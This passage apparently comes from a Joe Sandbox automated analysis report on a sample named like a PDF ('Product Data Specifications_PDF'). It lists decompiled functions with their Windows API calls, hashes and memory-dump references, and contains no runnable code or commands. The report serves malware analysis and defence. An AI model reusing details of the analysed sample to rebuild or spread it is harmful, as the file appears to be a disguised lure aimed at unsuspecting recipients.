                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                              • String ID:
                              • API String ID: 245547762-0
                              • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                              • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                              • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                              • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                              Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 004471D8
                              • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • SelectObject.GDI32(?,00000000), ref: 00447228
                              • BeginPath.GDI32(?), ref: 0044723D
                              • SelectObject.GDI32(?,00000000), ref: 00447266
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Object$Select$BeginCreateDeletePath
                              • String ID:
                              • API String ID: 2338827641-0
                              • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                              • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                              • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                              • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                              Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00434598
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                              • Sleep.KERNEL32(00000000), ref: 004345D4
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CounterPerformanceQuerySleep
                              • String ID:
                              • API String ID: 2875609808-0
                              • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                              • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                              Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                              • MessageBeep.USER32(00000000), ref: 00460C46
                              • KillTimer.USER32(?,0000040A), ref: 00460C68
                              • EndDialog.USER32(?,00000001), ref: 00460C83
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                              • String ID:
                              • API String ID: 3741023627-0
                              • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                              • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                              Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$Icon
                              • String ID:
                              • API String ID: 4023252218-0
                              • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                              • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                              Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                              • String ID:
                              • API String ID: 1489400265-0
                              • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                              • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                              Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyWindow.USER32(?), ref: 00455728
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                              • String ID:
                              • API String ID: 1042038666-0
                              • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                              • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                              Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0041780F
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __getptd.LIBCMT ref: 00417826
                              • __amsg_exit.LIBCMT ref: 00417834
                              • __lock.LIBCMT ref: 00417844
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                              • String ID:
                              • API String ID: 938513278-0
                              • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                              • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                              Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 2403457894-0
                              • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                              • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                              Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 4247068974-0
                              • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                              • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                              Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$U$\
                              • API String ID: 0-3705770531
                              • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                              • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                              Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 0046E505
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                              • CoUninitialize.OLE32 ref: 0046E53D
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                              • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                              Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                              • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                              • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                              • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                              Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                              Download Yara Rule
                              Strings
                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
